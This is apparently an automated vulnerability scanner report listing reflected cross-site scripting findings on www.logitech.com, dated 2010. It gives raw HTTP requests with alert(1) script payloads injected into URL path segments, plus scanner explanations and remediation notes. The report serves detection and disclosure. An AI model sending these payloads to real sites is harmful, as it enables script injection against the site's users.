GET /21f26</script><script>alert(1)</script>beb1794ac9d/speakers-audio/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38dfc"><script>alert(1)</script>4002821b1f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us38dfc"><script>alert(1)</script>4002821b1f9/speakers-audio/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9e65</script><script>alert(1)</script>1c6194941ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audioc9e65</script><script>alert(1)</script>1c6194941ab/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a59"><script>alert(1)</script>02ac9dd1b86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio81a59"><script>alert(1)</script>02ac9dd1b86/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8fd7</script><script>alert(1)</script>f16bc3b6461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/microphonese8fd7</script><script>alert(1)</script>f16bc3b6461 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9dd2"><script>alert(1)</script>c4d6403baec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/microphonesf9dd2"><script>alert(1)</script>c4d6403baec HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53ad7</script><script>alert(1)</script>1adf6b82e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /53ad7</script><script>alert(1)</script>1adf6b82e31/speakers-audio/wireless-music-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e88"><script>alert(1)</script>1cb602282b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa6e88"><script>alert(1)</script>1cb602282b6/speakers-audio/wireless-music-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b76b"><script>alert(1)</script>eb65c3a9089 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio8b76b"><script>alert(1)</script>eb65c3a9089/wireless-music-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c495</script><script>alert(1)</script>36d4a73ad40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio9c495</script><script>alert(1)</script>36d4a73ad40/wireless-music-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84dac"><script>alert(1)</script>9b587e48b78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/wireless-music-systems84dac"><script>alert(1)</script>9b587e48b78 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd371</script><script>alert(1)</script>8c250c7a11a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/wireless-music-systemsdd371</script><script>alert(1)</script>8c250c7a11a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfb3a</script><script>alert(1)</script>5bd4f6d97e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bfb3a</script><script>alert(1)</script>5bd4f6d97e9/speakers-audio/wireless-music-systems/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50768"%3bdc53b916d7e was submitted in the REST URL parameter 1. This input was echoed as 50768";dc53b916d7e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us50768"%3bdc53b916d7e/speakers-audio/wireless-music-systems/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28152"><script>alert(1)</script>c52a93d7559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us28152"><script>alert(1)</script>c52a93d7559/speakers-audio/wireless-music-systems/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a95a"><script>alert(1)</script>940ddaed59b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio7a95a"><script>alert(1)</script>940ddaed59b/wireless-music-systems/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfde</script><script>alert(1)</script>7a9c077fc03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio4cfde</script><script>alert(1)</script>7a9c077fc03/wireless-music-systems/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfbe9"><script>alert(1)</script>a898f717eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/wireless-music-systemsbfbe9"><script>alert(1)</script>a898f717eff/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e0ba</script><script>alert(1)</script>f517c1fbe0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/wireless-music-systems1e0ba</script><script>alert(1)</script>f517c1fbe0f/devices/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76f16"><script>alert(1)</script>966a6daadf7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/wireless-music-systems/devices76f16"><script>alert(1)</script>966a6daadf7/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae18a</script><script>alert(1)</script>3eed5582535 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/wireless-music-systems/devicesae18a</script><script>alert(1)</script>3eed5582535/5745 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c636"><script>alert(1)</script>d63e54e5e23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/wireless-music-systems/devices/57455c636"><script>alert(1)</script>d63e54e5e23 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61210</script><script>alert(1)</script>c5a162f252b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/wireless-music-systems/devices/574561210</script><script>alert(1)</script>c5a162f252b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd018</script><script>alert(1)</script>b32501e842e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dd018</script><script>alert(1)</script>b32501e842e/support-downloads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf07"><script>alert(1)</script>f9125301336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usdcf07"><script>alert(1)</script>f9125301336/support-downloads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 899bd</script><script>alert(1)</script>039c3555a9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads899bd</script><script>alert(1)</script>039c3555a9d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37787"><script>alert(1)</script>1655161a082 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads37787"><script>alert(1)</script>1655161a082 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a304"><script>alert(1)</script>cdd23d39cce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us3a304"><script>alert(1)</script>cdd23d39cce/support-downloads/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
